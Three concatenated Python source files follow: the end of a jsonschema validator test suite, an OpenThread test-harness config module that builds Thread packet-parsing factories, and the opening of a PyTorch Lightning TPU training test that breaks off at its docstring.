self.assertEqual(e2.absolute_path, deque(["foo"]))
self.assertEqual(
e2.schema_path, deque([1, "properties", "foo", "enum"]),
)
self.assertEqual(
e2.relative_schema_path, deque([1, "properties", "foo", "enum"]),
)
self.assertEqual(
e2.absolute_schema_path,
deque(["type", 1, "properties", "foo", "enum"]),
)
self.assertFalse(e2.context)
def test_single_nesting(self):
instance = {"foo" : 2, "bar" : [1], "baz" : 15, "quux" : "spam"}
schema = {
"properties" : {
"foo" : {"type" : "string"},
"bar" : {"minItems" : 2},
"baz" : {"maximum" : 10, "enum" : [2, 4, 6, 8]},
}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2, e3, e4 = sorted_errors(errors)
self.assertEqual(e1.path, deque(["bar"]))
self.assertEqual(e2.path, deque(["baz"]))
self.assertEqual(e3.path, deque(["baz"]))
self.assertEqual(e4.path, deque(["foo"]))
self.assertEqual(e1.relative_path, deque(["bar"]))
self.assertEqual(e2.relative_path, deque(["baz"]))
self.assertEqual(e3.relative_path, deque(["baz"]))
self.assertEqual(e4.relative_path, deque(["foo"]))
self.assertEqual(e1.absolute_path, deque(["bar"]))
self.assertEqual(e2.absolute_path, deque(["baz"]))
self.assertEqual(e3.absolute_path, deque(["baz"]))
self.assertEqual(e4.absolute_path, deque(["foo"]))
self.assertEqual(e1.validator, "minItems")
self.assertEqual(e2.validator, "enum")
self.assertEqual(e3.validator, "maximum")
self.assertEqual(e4.validator, "type")
def test_multiple_nesting(self):
instance = [1, {"foo" : 2, "bar" : {"baz" : [1]}}, "quux"]
schema = {
"type" : "string",
"items" : {
"type" : ["string", "object"],
"properties" : {
"foo" : {"enum" : [1, 3]},
"bar" : {
"type" : "array",
"properties" : {
"bar" : {"required" : True},
"baz" : {"minItems" : 2},
}
}
}
}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2, e3, e4, e5, e6 = sorted_errors(errors)
self.assertEqual(e1.path, deque([]))
self.assertEqual(e2.path, deque([0]))
self.assertEqual(e3.path, deque([1, "bar"]))
self.assertEqual(e4.path, deque([1, "bar", "bar"]))
self.assertEqual(e5.path, deque([1, "bar", "baz"]))
self.assertEqual(e6.path, deque([1, "foo"]))
self.assertEqual(e1.schema_path, deque(["type"]))
self.assertEqual(e2.schema_path, deque(["items", "type"]))
self.assertEqual(
list(e3.schema_path), ["items", "properties", "bar", "type"],
)
self.assertEqual(
list(e4.schema_path),
["items", "properties", "bar", "properties", "bar", "required"],
)
self.assertEqual(
list(e5.schema_path),
["items", "properties", "bar", "properties", "baz", "minItems"]
)
self.assertEqual(
list(e6.schema_path), ["items", "properties", "foo", "enum"],
)
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "type")
self.assertEqual(e3.validator, "type")
self.assertEqual(e4.validator, "required")
self.assertEqual(e5.validator, "minItems")
self.assertEqual(e6.validator, "enum")
def test_recursive(self):
schema = {
"definitions": {
"node": {
"anyOf": [{
"type": "object",
"required": ["name", "children"],
"properties": {
"name": {
"type": "string",
},
"children": {
"type": "object",
"patternProperties": {
"^.*$": {
"$ref": "#/definitions/node",
},
},
},
},
}],
},
},
"type": "object",
"required": ["root"],
"properties": {
"root": {"$ref": "#/definitions/node"},
}
}
instance = {
"root": {
"name": "root",
"children": {
"a": {
"name": "a",
"children": {
"ab": {
"name": "ab",
# missing "children"
}
}
},
},
},
}
validator = Draft4Validator(schema)
e, = validator.iter_errors(instance)
self.assertEqual(e.absolute_path, deque(["root"]))
self.assertEqual(
e.absolute_schema_path, deque(["properties", "root", "anyOf"]),
)
e1, = e.context
self.assertEqual(e1.absolute_path, deque(["root", "children", "a"]))
self.assertEqual(
e1.absolute_schema_path, deque(
[
"properties",
"root",
"anyOf",
0,
"properties",
"children",
"patternProperties",
"^.*$",
"anyOf",
],
),
)
e2, = e1.context
self.assertEqual(
e2.absolute_path, deque(
["root", "children", "a", "children", "ab"],
),
)
self.assertEqual(
e2.absolute_schema_path, deque(
[
"properties",
"root",
"anyOf",
0,
"properties",
"children",
"patternProperties",
"^.*$",
"anyOf",
0,
"properties",
"children",
"patternProperties",
"^.*$",
"anyOf"
],
),
)
def test_additionalProperties(self):
instance = {"bar": "bar", "foo": 2}
schema = {
"additionalProperties" : {"type": "integer", "minimum": 5}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque(["bar"]))
self.assertEqual(e2.path, deque(["foo"]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
def test_patternProperties(self):
instance = {"bar": 1, "foo": 2}
schema = {
"patternProperties" : {
"bar": {"type": "string"},
"foo": {"minimum": 5}
}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque(["bar"]))
self.assertEqual(e2.path, deque(["foo"]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
def test_additionalItems(self):
instance = ["foo", 1]
schema = {
"items": [],
"additionalItems" : {"type": "integer", "minimum": 5}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque([0]))
self.assertEqual(e2.path, deque([1]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
def test_additionalItems_with_items(self):
instance = ["foo", "bar", 1]
schema = {
"items": [{}],
"additionalItems" : {"type": "integer", "minimum": 5}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque([1]))
self.assertEqual(e2.path, deque([2]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
class ValidatorTestMixin(object):
def setUp(self):
self.instance = mock.Mock()
self.schema = {}
self.resolver = mock.Mock()
self.validator = self.validator_class(self.schema)
def test_valid_instances_are_valid(self):
errors = iter([])
with mock.patch.object(
self.validator, "iter_errors", return_value=errors,
):
self.assertTrue(
self.validator.is_valid(self.instance, self.schema)
)
def test_invalid_instances_are_not_valid(self):
errors = iter([mock.Mock()])
with mock.patch.object(
self.validator, "iter_errors", return_value=errors,
):
self.assertFalse(
self.validator.is_valid(self.instance, self.schema)
)
def test_non_existent_properties_are_ignored(self):
instance, my_property, my_value = mock.Mock(), mock.Mock(), mock.Mock()
validate(instance=instance, schema={my_property : my_value})
def test_it_creates_a_ref_resolver_if_not_provided(self):
self.assertIsInstance(self.validator.resolver, RefResolver)
def test_it_delegates_to_a_ref_resolver(self):
resolver = RefResolver("", {})
schema = {"$ref" : mock.Mock()}
@contextmanager
def resolving():
yield {"type": "integer"}
with mock.patch.object(resolver, "resolving") as resolve:
resolve.return_value = resolving()
with self.assertRaises(ValidationError):
self.validator_class(schema, resolver=resolver).validate(None)
resolve.assert_called_once_with(schema["$ref"])
def test_is_type_is_true_for_valid_type(self):
self.assertTrue(self.validator.is_type("foo", "string"))
def test_is_type_is_false_for_invalid_type(self):
self.assertFalse(self.validator.is_type("foo", "array"))
def test_is_type_evades_bool_inheriting_from_int(self):
self.assertFalse(self.validator.is_type(True, "integer"))
self.assertFalse(self.validator.is_type(True, "number"))
def test_is_type_raises_exception_for_unknown_type(self):
with self.assertRaises(UnknownType):
self.validator.is_type("foo", object())
class TestDraft3Validator(ValidatorTestMixin, unittest.TestCase):
validator_class = Draft3Validator
def test_is_type_is_true_for_any_type(self):
self.assertTrue(self.validator.is_valid(mock.Mock(), {"type": "any"}))
def test_is_type_does_not_evade_bool_if_it_is_being_tested(self):
self.assertTrue(self.validator.is_type(True, "boolean"))
self.assertTrue(self.validator.is_valid(True, {"type": "any"}))
def test_non_string_custom_types(self):
schema = {'type': [None]}
cls = self.validator_class(schema, types={None: type(None)})
cls.validate(None, schema)
class TestDraft4Validator(ValidatorTestMixin, unittest.TestCase):
validator_class = Draft4Validator
class TestBuiltinFormats(unittest.TestCase):
"""
The built-in (specification-defined) formats do not raise type errors.
If an instance or value is not a string, it should be ignored.
"""
for format in FormatChecker.checkers:
def test(self, format=format):
v = Draft4Validator({"format": format}, format_checker=FormatChecker())
v.validate(123)
name = "test_{0}_ignores_non_strings".format(format)
test.__name__ = name
setattr(TestBuiltinFormats, name, test)
del test # Ugh py.test. Stop discovering top level tests.
class TestValidatorFor(unittest.TestCase):
def test_draft_3(self):
schema = {"$schema" : "http://json-schema.org/draft-03/schema"}
self.assertIs(validator_for(schema), Draft3Validator)
schema = {"$schema" : "http://json-schema.org/draft-03/schema#"}
self.assertIs(validator_for(schema), Draft3Validator)
def test_draft_4(self):
schema = {"$schema" : "http://json-schema.org/draft-04/schema"}
self.assertIs(validator_for(schema), Draft4Validator)
schema = {"$schema" : "http://json-schema.org/draft-04/schema#"}
self.assertIs(validator_for(schema), Draft4Validator)
def test_custom_validator(self):
Validator = create(meta_schema={"id" : "meta schema id"}, version="12")
schema = {"$schema" : "meta schema id"}
self.assertIs(validator_for(schema), Validator)
def test_validator_for_jsonschema_default(self):
self.assertIs(validator_for({}), Draft4Validator)
def test_validator_for_custom_default(self):
self.assertIs(validator_for({}, default=None), None)
class TestValidate(unittest.TestCase):
def test_draft3_validator_is_chosen(self):
schema = {"$schema" : "http://json-schema.org/draft-03/schema#"}
with mock.patch.object(Draft3Validator, "check_schema") as chk_schema:
validate({}, schema)
chk_schema.assert_called_once_with(schema)
# Make sure it works without the empty fragment
schema = {"$schema" : "http://json-schema.org/draft-03/schema"}
with mock.patch.object(Draft3Validator, "check_schema") as chk_schema:
validate({}, schema)
chk_schema.assert_called_once_with(schema)
def test_draft4_validator_is_chosen(self):
schema = {"$schema" : "http://json-schema.org/draft-04/schema#"}
with mock.patch.object(Draft4Validator, "check_schema") as chk_schema:
validate({}, schema)
chk_schema.assert_called_once_with(schema)
def test_draft4_validator_is_the_default(self):
with mock.patch.object(Draft4Validator, "check_schema") as chk_schema:
validate({}, {})
chk_schema.assert_called_once_with({})
class TestRefResolver(unittest.TestCase):
base_uri = ""
stored_uri = "foo://stored"
stored_schema = {"stored" : "schema"}
def setUp(self):
self.referrer = {}
self.store = {self.stored_uri : self.stored_schema}
self.resolver = RefResolver(self.base_uri, self.referrer, self.store)
def test_it_does_not_retrieve_schema_urls_from_the_network(self):
ref = Draft3Validator.META_SCHEMA["id"]
with mock.patch.object(self.resolver, "resolve_remote") as remote:
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, Draft3Validator.META_SCHEMA)
self.assertFalse(remote.called)
def test_it_resolves_local_refs(self):
ref = "#/properties/foo"
self.referrer["properties"] = {"foo" : object()}
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, self.referrer["properties"]["foo"])
def test_it_resolves_local_refs_with_id(self):
schema = {"id": "foo://bar/schema#", "a": {"foo": "bar"}}
resolver = RefResolver.from_schema(schema)
with resolver.resolving("#/a") as resolved:
self.assertEqual(resolved, schema["a"])
with resolver.resolving("foo://bar/schema#/a") as resolved:
self.assertEqual(resolved, schema["a"])
def test_it_retrieves_stored_refs(self):
with self.resolver.resolving(self.stored_uri) as resolved:
self.assertIs(resolved, self.stored_schema)
self.resolver.store["cached_ref"] = {"foo" : 12}
with self.resolver.resolving("cached_ref#/foo") as resolved:
self.assertEqual(resolved, 12)
def test_it_retrieves_unstored_refs_via_requests(self):
ref = "http://bar#baz"
schema = {"baz" : 12}
with mock.patch("jsonschema.validators.requests") as requests:
requests.get.return_value.json.return_value = schema
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, 12)
requests.get.assert_called_once_with("http://bar")
def test_it_retrieves_unstored_refs_via_urlopen(self):
ref = "http://bar#baz"
schema = {"baz" : 12}
with mock.patch("jsonschema.validators.requests", None):
with mock.patch("jsonschema.validators.urlopen") as urlopen:
urlopen.return_value.read.return_value = (
json.dumps(schema).encode("utf8"))
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, 12)
urlopen.assert_called_once_with("http://bar")
def test_it_can_construct_a_base_uri_from_a_schema(self):
schema = {"id" : "foo"}
resolver = RefResolver.from_schema(schema)
self.assertEqual(resolver.base_uri, "foo")
with resolver.resolving("") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("#") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("foo") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("foo#") as resolved:
self.assertEqual(resolved, schema)
def test_it_can_construct_a_base_uri_from_a_schema_without_id(self):
schema = {}
resolver = RefResolver.from_schema(schema)
self.assertEqual(resolver.base_uri, "")
with resolver.resolving("") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("#") as resolved:
self.assertEqual(resolved, schema)
def test_custom_uri_scheme_handlers(self):
schema = {"foo": "bar"}
ref = "foo://bar"
foo_handler = mock.Mock(return_value=schema)
resolver = RefResolver("", {}, handlers={"foo": foo_handler})
with resolver.resolving(ref) as resolved:
self.assertEqual(resolved, schema)
foo_handler.assert_called_once_with(ref)
def test_cache_remote_on(self):
ref = "foo://bar"
foo_handler = mock.Mock()
resolver = RefResolver(
"", {}, cache_remote=True, handlers={"foo" : foo_handler},
)
with resolver.resolving(ref):
pass
with resolver.resolving(ref):
pass
foo_handler.assert_called_once_with(ref)
def test_cache_remote_off(self):
ref = "foo://bar"
foo_handler = mock.Mock()
resolver = RefResolver(
"", {}, cache_remote=False, handlers={"foo" : foo_handler},
)
with resolver.resolving(ref):
pass
with resolver.resolving(ref):
pass
self.assertEqual(foo_handler.call_count, 2)
def test_if_you_give_it_junk_you_get_a_resolution_error(self):
ref = "foo://bar"
foo_handler = mock.Mock(side_effect=ValueError("Oh no! What's this?"))
resolver = RefResolver("", {}, handlers={"foo" : foo_handler})
with self.assertRaises(RefResolutionError) as err:
with resolver.resolving(ref):
pass
self.assertEqual(str(err.exception), "Oh no! What's this?")
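# Usage sketch (illustrative, not part of the suite): resolving a local JSON
# pointer with RefResolver, mirroring the tests above:
#
#     resolver = RefResolver.from_schema({"properties": {"foo": {}}})
#     with resolver.resolving("#/properties/foo") as subschema:
#         ...  # `subschema` is the object stored at that pointer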
def sorted_errors(errors):
def key(error):
return (
[str(e) for e in error.path],
[str(e) for e in error.schema_path]
)
return sorted(errors, key=key)
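# Illustrative note: sorting first by instance path and then by schema path
# makes error ordering deterministic, so suites can assert on whole lists
# (`validator`, `instance` and `expected_paths` are placeholders here):
#
#     errors = sorted_errors(validator.iter_errors(instance))
#     assert [list(e.path) for e in errors] == expected_paths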
|
|
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import os
from enum import Enum
import coap
import ipv6
import lowpan
import message
import mle
import net_crypto
import network_data
import network_layer
import simulator
import sniffer
MESH_LOCAL_PREFIX = 'fdde:ad00:beef::/64'
MESH_LOCAL_PREFIX_REGEX_PATTERN = '^fdde:ad00:beef:(0){0,4}:'
ROUTING_LOCATOR = '64/:0:ff:fe00:/16'
ROUTING_LOCATOR_REGEX_PATTERN = r'.*:(0)?:0{0,2}ff:fe00:\w{1,4}$'
LINK_LOCAL = 'fe80:/112'
LINK_LOCAL_REGEX_PATTERN = '^fe80:.*'
ALOC_FLAG_REGEX_PATTERN = '.*:fc..$'
LINK_LOCAL_All_THREAD_NODES_MULTICAST_ADDRESS = 'ff32:40:fdde:ad00:beef:0:0:1'
REALM_LOCAL_All_THREAD_NODES_MULTICAST_ADDRESS = 'ff33:40:fdde:ad00:beef:0:0:1'
REALM_LOCAL_ALL_ROUTERS_ADDRESS = 'ff03::2'
LINK_LOCAL_ALL_NODES_ADDRESS = 'ff02::1'
LINK_LOCAL_ALL_ROUTERS_ADDRESS = 'ff02::2'
DEFAULT_MASTER_KEY = bytearray([0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff])
ADDRESS_TYPE = Enum('ADDRESS_TYPE', ('LINK_LOCAL', 'GLOBAL', 'RLOC', 'ALOC', 'ML_EID'))
RSSI = {'LINK_QUALITY_0': -100, 'LINK_QUALITY_1': -95, 'LINK_QUALITY_2': -85, 'LINK_QUALITY_3': -65}
SNIFFER_ID = int(os.getenv('SNIFFER_ID', 34))
PANID = 0xface
MAX_NEIGHBOR_AGE = 100
INFINITE_COST_TIMEOUT = 90
MAX_ADVERTISEMENT_INTERVAL = 32
MLE_END_DEVICE_TIMEOUT = 100
AQ_TIMEOUT = 3
ADDRESS_QUERY_INITIAL_RETRY_DELAY = 15
VIRTUAL_TIME = bool(int(os.getenv('VIRTUAL_TIME', 0)))
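# Illustrative: both knobs above are environment-driven, e.g.
#
#     SNIFFER_ID=42 VIRTUAL_TIME=1 python some_cert_test.py
#
# (the script name is a placeholder) picks sniffer node 42 and the
# virtual-time simulator; see create_default_simulator() below.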
def create_default_network_data_prefix_sub_tlvs_factories():
return {
network_data.TlvType.HAS_ROUTE: network_data.HasRouteFactory(
routes_factory=network_data.RoutesFactory(
route_factory=network_data.RouteFactory())
),
network_data.TlvType.BORDER_ROUTER: network_data.BorderRouterFactory(),
network_data.TlvType.LOWPAN_ID: network_data.LowpanIdFactory()
}
def create_default_network_data_prefix_sub_tlvs_factory():
return network_data.PrefixSubTlvsFactory(
sub_tlvs_factories=create_default_network_data_prefix_sub_tlvs_factories())
def create_default_network_data_service_sub_tlvs_factories():
return {
network_data.TlvType.SERVER: network_data.ServerFactory()
}
def create_default_network_data_service_sub_tlvs_factory():
return network_data.ServiceSubTlvsFactory(
sub_tlvs_factories=create_default_network_data_service_sub_tlvs_factories())
def create_default_network_data_commissioning_data_sub_tlvs_factories():
return {
network_data.MeshcopTlvType.STEERING_DATA: network_data.SteeringDataFactory(),
network_data.MeshcopTlvType.BORDER_AGENT_LOCATOR: network_data.BorderAgentLocatorFactory(),
network_data.MeshcopTlvType.COMMISSIONER_SESSION_ID: network_data.CommissionerSessionIdFactory(),
network_data.MeshcopTlvType.COMMISSIONER_UDP_PORT: network_data.CommissionerUdpPortFactory(),
}
def create_default_network_data_commissioning_data_sub_tlvs_factory():
return network_data.CommissioningDataSubTlvsFactory(
sub_tlvs_factories=create_default_network_data_commissioning_data_sub_tlvs_factories())
def create_default_network_data_tlvs_factories():
return {
network_data.TlvType.PREFIX: network_data.PrefixFactory(
sub_tlvs_factory=create_default_network_data_prefix_sub_tlvs_factory()
),
network_data.TlvType.SERVICE: network_data.ServiceFactory(
sub_tlvs_factory=create_default_network_data_service_sub_tlvs_factory()
),
network_data.TlvType.COMMISSIONING: network_data.CommissioningDataFactory(
sub_tlvs_factory=create_default_network_data_commissioning_data_sub_tlvs_factory()
),
}
def create_default_network_data_tlvs_factory():
return network_data.NetworkDataTlvsFactory(
sub_tlvs_factories=create_default_network_data_tlvs_factories())
def create_default_mle_tlv_route64_factory():
return mle.Route64Factory(
link_quality_and_route_data_factory=mle.LinkQualityAndRouteDataFactory())
def create_default_mle_tlv_network_data_factory():
return mle.NetworkDataFactory(
network_data_tlvs_factory=create_default_network_data_tlvs_factory())
def create_default_mle_tlv_address_registration_factory():
return mle.AddressRegistrationFactory(
addr_compressed_factory=mle.AddressCompressedFactory(),
addr_full_factory=mle.AddressFullFactory())
def create_default_mle_tlvs_factories():
return {
mle.TlvType.SOURCE_ADDRESS: mle.SourceAddressFactory(),
mle.TlvType.MODE: mle.ModeFactory(),
mle.TlvType.TIMEOUT: mle.TimeoutFactory(),
mle.TlvType.CHALLENGE: mle.ChallengeFactory(),
mle.TlvType.RESPONSE: mle.ResponseFactory(),
mle.TlvType.LINK_LAYER_FRAME_COUNTER: mle.LinkLayerFrameCounterFactory(),
mle.TlvType.MLE_FRAME_COUNTER: mle.MleFrameCounterFactory(),
mle.TlvType.ROUTE64: create_default_mle_tlv_route64_factory(),
mle.TlvType.ADDRESS16: mle.Address16Factory(),
mle.TlvType.LEADER_DATA: mle.LeaderDataFactory(),
mle.TlvType.NETWORK_DATA: create_default_mle_tlv_network_data_factory(),
mle.TlvType.TLV_REQUEST: mle.TlvRequestFactory(),
mle.TlvType.SCAN_MASK: mle.ScanMaskFactory(),
mle.TlvType.CONNECTIVITY: mle.ConnectivityFactory(),
mle.TlvType.LINK_MARGIN: mle.LinkMarginFactory(),
mle.TlvType.STATUS: mle.StatusFactory(),
mle.TlvType.VERSION: mle.VersionFactory(),
mle.TlvType.ADDRESS_REGISTRATION: create_default_mle_tlv_address_registration_factory(),
mle.TlvType.CHANNEL: mle.ChannelFactory(),
mle.TlvType.PANID: mle.PanIdFactory(),
mle.TlvType.ACTIVE_TIMESTAMP: mle.ActiveTimestampFactory(),
mle.TlvType.PENDING_TIMESTAMP: mle.PendingTimestampFactory(),
mle.TlvType.ACTIVE_OPERATIONAL_DATASET: mle.ActiveOperationalDatasetFactory(),
mle.TlvType.PENDING_OPERATIONAL_DATASET: mle.PendingOperationalDatasetFactory(),
mle.TlvType.THREAD_DISCOVERY: mle.ThreadDiscoveryFactory()
}
def create_default_mle_crypto_engine(master_key):
return net_crypto.CryptoEngine(crypto_material_creator=net_crypto.MleCryptoMaterialCreator(master_key))
def create_default_mle_message_factory(master_key):
return mle.MleMessageFactory(
aux_sec_hdr_factory=net_crypto.AuxiliarySecurityHeaderFactory(),
mle_command_factory=mle.MleCommandFactory(
tlvs_factories=create_default_mle_tlvs_factories()),
crypto_engine=create_default_mle_crypto_engine(master_key))
def create_default_network_tlvs_factories():
return {
network_layer.TlvType.TARGET_EID: network_layer.TargetEidFactory(),
network_layer.TlvType.MAC_EXTENDED_ADDRESS: network_layer.MacExtendedAddressFactory(),
network_layer.TlvType.RLOC16: network_layer.Rloc16Factory(),
network_layer.TlvType.ML_EID: network_layer.MlEidFactory(),
network_layer.TlvType.STATUS: network_layer.StatusFactory(),
network_layer.TlvType.TIME_SINCE_LAST_TRANSACTION: network_layer.TimeSinceLastTransactionFactory(),
network_layer.TlvType.ROUTER_MASK: network_layer.RouterMaskFactory(),
network_layer.TlvType.ND_OPTION: network_layer.NdOptionFactory(),
network_layer.TlvType.ND_DATA: network_layer.NdDataFactory(),
network_layer.TlvType.THREAD_NETWORK_DATA: network_layer.ThreadNetworkDataFactory(create_default_network_data_tlvs_factory()),
        # Routing information is distributed in a Thread network via the MLE
        # Routing TLV, which is in fact the MLE Route64 TLV. See Thread
        # specification v1.1, Chapter 5.20.
network_layer.TlvType.MLE_ROUTING: create_default_mle_tlv_route64_factory()
}
def create_default_network_tlvs_factory():
return network_layer.NetworkLayerTlvsFactory(
        tlvs_factories=create_default_network_tlvs_factories())
def create_default_uri_path_based_payload_factories():
network_layer_tlvs_factory = create_default_network_tlvs_factory()
return {
"/a/as": network_layer_tlvs_factory,
"/a/aq": network_layer_tlvs_factory,
"/a/ar": network_layer_tlvs_factory,
"/a/ae": network_layer_tlvs_factory,
"/a/an": network_layer_tlvs_factory,
"/a/sd": network_layer_tlvs_factory
}
def create_default_coap_message_factory():
return coap.CoapMessageFactory(options_factory=coap.CoapOptionsFactory(),
uri_path_based_payload_factories=create_default_uri_path_based_payload_factories(),
message_id_to_uri_path_binder=coap.CoapMessageIdToUriPathBinder())
def create_default_ipv6_hop_by_hop_options_factories():
return {
109: ipv6.MPLOptionFactory()
}
def create_default_ipv6_hop_by_hop_options_factory():
return ipv6.HopByHopOptionsFactory(
options_factories=create_default_ipv6_hop_by_hop_options_factories())
def create_default_based_on_src_dst_ports_udp_payload_factory(master_key):
mle_message_factory = create_default_mle_message_factory(master_key)
coap_message_factory = create_default_coap_message_factory()
return ipv6.UdpBasedOnSrcDstPortsPayloadFactory(
src_dst_port_based_payload_factories={
19788: mle_message_factory,
61631: coap_message_factory
}
)
def create_default_ipv6_icmp_body_factories():
return {
ipv6.ICMP_DESTINATION_UNREACHABLE: ipv6.ICMPv6DestinationUnreachableFactory(),
ipv6.ICMP_ECHO_REQUEST: ipv6.ICMPv6EchoBodyFactory(),
ipv6.ICMP_ECHO_RESPONSE: ipv6.ICMPv6EchoBodyFactory(),
"default": ipv6.BytesPayloadFactory()
}
def create_default_ipv6_upper_layer_factories(master_key):
return {
ipv6.IPV6_NEXT_HEADER_UDP: ipv6.UDPDatagramFactory(
udp_header_factory=ipv6.UDPHeaderFactory(),
udp_payload_factory=create_default_based_on_src_dst_ports_udp_payload_factory(master_key)
),
ipv6.IPV6_NEXT_HEADER_ICMP: ipv6.ICMPv6Factory(
body_factories=create_default_ipv6_icmp_body_factories()
)
}
def create_default_lowpan_extension_headers_factories():
return {
ipv6.IPV6_NEXT_HEADER_HOP_BY_HOP: lowpan.LowpanHopByHopFactory(
hop_by_hop_options_factory=create_default_ipv6_hop_by_hop_options_factory()
)
}
def create_default_ipv6_extension_headers_factories():
return {
ipv6.IPV6_NEXT_HEADER_HOP_BY_HOP: ipv6.HopByHopFactory(
hop_by_hop_options_factory=create_default_ipv6_hop_by_hop_options_factory())
}
def create_default_ipv6_packet_factory(master_key):
return ipv6.IPv6PacketFactory(
ehf=create_default_ipv6_extension_headers_factories(),
ulpf=create_default_ipv6_upper_layer_factories(master_key)
)
def create_default_lowpan_decompressor(context_manager):
return lowpan.LowpanDecompressor(
lowpan_ip_header_factory=lowpan.LowpanIpv6HeaderFactory(
context_manager=context_manager
),
lowpan_extension_headers_factory=lowpan.LowpanExtensionHeadersFactory(
ext_headers_factories=create_default_lowpan_extension_headers_factories()
),
lowpan_udp_header_factory=lowpan.LowpanUdpHeaderFactory()
)
def create_default_thread_context_manager():
context_manager = lowpan.ContextManager()
context_manager[0] = lowpan.Context(MESH_LOCAL_PREFIX)
return context_manager
def create_default_lowpan_parser(context_manager, master_key=DEFAULT_MASTER_KEY):
return lowpan.LowpanParser(
lowpan_mesh_header_factory=lowpan.LowpanMeshHeaderFactory(),
lowpan_decompressor=create_default_lowpan_decompressor(context_manager),
lowpan_fragements_buffers_manager=lowpan.LowpanFragmentsBuffersManager(),
ipv6_packet_factory=create_default_ipv6_packet_factory(master_key)
)
def create_default_thread_message_factory(master_key=DEFAULT_MASTER_KEY):
context_manager = create_default_thread_context_manager()
lowpan_parser = create_default_lowpan_parser(context_manager, master_key)
return message.MessageFactory(lowpan_parser=lowpan_parser)
def create_default_thread_sniffer(nodeid=SNIFFER_ID):
return sniffer.Sniffer(nodeid, create_default_thread_message_factory())
def create_default_simulator():
if VIRTUAL_TIME:
return simulator.VirtualTime()
return simulator.RealTime()
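# Minimal assembly sketch (illustrative; mirrors what the helpers above do
# internally, assuming the OpenThread test harness modules are importable):
#
#     context_manager = create_default_thread_context_manager()
#     parser = create_default_lowpan_parser(context_manager, DEFAULT_MASTER_KEY)
#     factory = message.MessageFactory(lowpan_parser=parser)
#     thread_sniffer = sniffer.Sniffer(SNIFFER_ID, factory)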
|
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import collections
from copy import deepcopy
import pytest
import torch
from torch import nn
from pytorch_lightning import Trainer
from pytorch_lightning.accelerators.cpu import CPUAccelerator
from pytorch_lightning.accelerators.tpu import TPUAccelerator
from pytorch_lightning.callbacks import Callback
from pytorch_lightning.plugins import TPUSpawnPlugin
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.helpers.boring_model import BoringModel
from tests.helpers.runif import RunIf
from tests.helpers.utils import pl_multi_process_test
class WeightSharingModule(BoringModel):
def __init__(self):
super().__init__()
self.layer_1 = nn.Linear(32, 10, bias=False)
self.layer_2 = nn.Linear(10, 32, bias=False)
self.layer_3 = nn.Linear(32, 10, bias=False)
self.layer_3.weight = self.layer_1.weight
def forward(self, x):
x = self.layer_1(x)
x = self.layer_2(x)
x = self.layer_3(x)
return x
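# Sanity sketch (illustrative, CPU-only): the assignment in __init__ makes
# layer_1 and layer_3 share the very same Parameter object, so:
#
#     m = WeightSharingModule()
#     assert m.layer_1.weight is m.layer_3.weight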
@RunIf(tpu=True)
@pl_multi_process_test
def test_resume_training_on_cpu(tmpdir):
"""Checks if training can be resumed from a saved checkpoint on CPU"""
